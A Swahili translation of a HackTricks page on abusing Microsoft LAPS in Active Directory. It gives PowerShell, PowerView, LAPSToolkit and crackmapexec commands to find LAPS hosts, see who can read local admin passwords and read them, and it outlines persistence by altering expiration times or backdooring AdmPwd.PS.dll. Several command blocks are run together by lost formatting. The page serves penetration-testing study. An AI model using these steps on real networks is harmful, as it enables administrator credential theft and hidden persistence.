Je, unafanya kazi katika kampuni ya usalama wa mtandao? Unataka kuona kampuni yako ikitangazwa kwenye HackTricks? au unataka kupata upatikanaji wa toleo jipya la PEASS au kupakua HackTricks kwa PDF? Angalia MIPANGO YA KUJIUNGA!
LAPS (Local Administrator Password Solution) ni zana inayotumika kusimamia mfumo ambapo manenosiri ya msimamizi, ambayo ni ya kipekee, yaliyochanganywa, na yanabadilishwa mara kwa mara, hutumiwa kwa kompyuta zilizojiunga na uwanja. Manenosiri haya hifadhiwa kwa usalama ndani ya Active Directory na yanapatikana tu kwa watumiaji ambao wamepewa idhini kupitia Orodha za Kudhibiti Upatikanaji (ACLs). Usalama wa maambukizi ya nenosiri kutoka kwa mteja kwenda kwa seva unahakikishwa kwa kutumia Kerberos toleo la 5 na Advanced Encryption Standard (AES).
Katika vitu vya kompyuta vya uwanja, utekelezaji wa LAPS husababisha kuongezwa kwa sifa mbili mpya: ms-mcs-AdmPwd na ms-mcs-AdmPwdExpirationTime. Sifa hizi hifadhi nenosiri la msimamizi katika maandishi wazi na muda wake wa kumalizika, mtawalia.
Angalia ikiwa imewashwa
regquery"HKLM\Software\Policies\Microsoft Services\AdmPwd"/vAdmPwdEnableddir"C:\Program Files\LAPS\CSE"# Check if that folder exists and contains AdmPwd.dll# Find GPOs that have "LAPS" or some other descriptive term in the nameGet-DomainGPO|?{ $_.DisplayName-like"*laps*"}|select DisplayName, Name, GPCFileSysPath |fl# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
Upatikanaji wa Nywila za LAPS
Unaweza kupakua sera ya LAPS ya asili kutoka \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol na kisha kutumia Parse-PolFile kutoka kwenye GPRegistryPolicyParser pakiti inaweza kutumika kubadilisha faili hii kuwa muundo unaoeleweka na binadamu.
Zaidi ya hayo, cmdlets za LAPS za asili za PowerShell zinaweza kutumika ikiwa zimefungwa kwenye mashine tunayoweza kupata:
Get-Command*AdmPwd*CommandType Name Version Source----------------------------Cmdlet Find-AdmPwdExtendedRights5.0.0.0 AdmPwd.PSCmdlet Get-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Reset-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdAuditing5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdComputerSelfPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdReadPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdResetPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Update-AdmPwdADSchema5.0.0.0 AdmPwd.PS# List who can read LAPS password of the given OUFind-AdmPwdExtendedRights-Identity Workstations | fl# Read the passwordGet-AdmPwdPassword-ComputerName wkstn-2| fl
PowerView inaweza kutumika pia kujua nani anaweza kusoma nenosiri na kulisoma:
# Find the principals that have ReadPropery on ms-Mcs-AdmPwdGet-AdmPwdPassword-ComputerName wkstn-2| fl# Read the passwordGet-DomainObject-Identity wkstn-2-Properties ms-Mcs-AdmPwd
Zana za LAPSToolkit
Zana za LAPSToolkit inarahisisha uorodheshaji wa LAPS hii kwa kutumia kazi kadhaa. Moja ni kuchambua ExtendedRights kwa kompyuta zote zilizo na LAPS imewezeshwa. Hii itaonyesha makundi maalum yaliyoruhusiwa kusoma nywila za LAPS, ambazo mara nyingi ni watumiaji katika makundi yaliyolindwa.
Akaunti ambayo imejiunga na kompyuta kwenye kikoa hupokea Haki Zote za Kipekee juu ya mwenyeji huyo, na haki hii inampa akaunti uwezo wa kusoma nywila. Uorodheshaji unaweza kuonyesha akaunti ya mtumiaji ambayo inaweza kusoma nywila ya LAPS kwenye mwenyeji. Hii inaweza kutusaidia kulenga watumiaji maalum wa AD ambao wanaweza kusoma nywila za LAPS.
# Get groups that can read passwordsFind-LAPSDelegatedGroupsOrgUnit Delegated Groups-----------------------OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain AdminsOU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin# Checks the rights on each computer with LAPS enabled for any groups# with read access and users with "All Extended Rights"Find-AdmPwdExtendedRightsComputerName Identity Reason--------------------------MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins DelegatedMSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated# Get computers with LAPS enabled, expirations time and the password (if you have access)Get-LAPSComputersComputerName Password Expiration------------------------------DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf%12/10/202213:24:41
Kudondoa Nywila za LAPS Kwa Kutumia Crackmapexec
Ikiwa hakuna ufikiaji wa powershell unaweza kutumia mamlaka haya vibaya kijuujuu kupitia LDAP kwa kutumia
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
Utulivu wa LAPS
Tarehe ya Muda
Maradhi ya admin, ni wezekano wa kupata nywila na kuzuia mashine kutoka kuboresha nywila yake kwa kuweka tarehe ya kumalizika muda kuwa ya baadaye.
# Get expiration timeGet-DomainObject-Identity computer-21-Properties ms-mcs-admpwdexpirationtime# Change expiration time## It's needed SYSTEM on the computerSet-DomainObject-Identity wkstn-2-Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
Nenosiri bado yataweza kurejeshwa ikiwa msimamizi anatumia Reset-AdmPwdPassword cmdlet; au ikiwa Usiruhusu muda wa kumalizika kwa nenosiri kuwa mrefu kuliko ulivyowekwa na sera imeanzishwa katika LAPS GPO.
Mlango wa Nyuma
Msimbo wa chanzo halisi wa LAPS unaweza kupatikana hapa, hivyo niwezekanavyo kuweka mlango wa nyuma katika msimbo (ndani ya mbinu ya Get-AdmPwdPassword katika Main/AdmPwd.PS/Main.cs kwa mfano) ambao kwa namna fulani utaondoa nywila mpya au kuzihifadhi mahali fulani.
Kisha, tuunde upya AdmPwd.PS.dll na kuipakia kwenye mashine katika C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll (na ubadilishe wakati wa marekebisho).
Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikitangazwa kwenye HackTricks? au ungependa kupata upatikanaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MIPANGO YA KUJIUNGA!
Jiunge na💬kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha telegram](https://t.me/peass) au nifuatilie kwenye Twitter 🐦@carlospolopm.
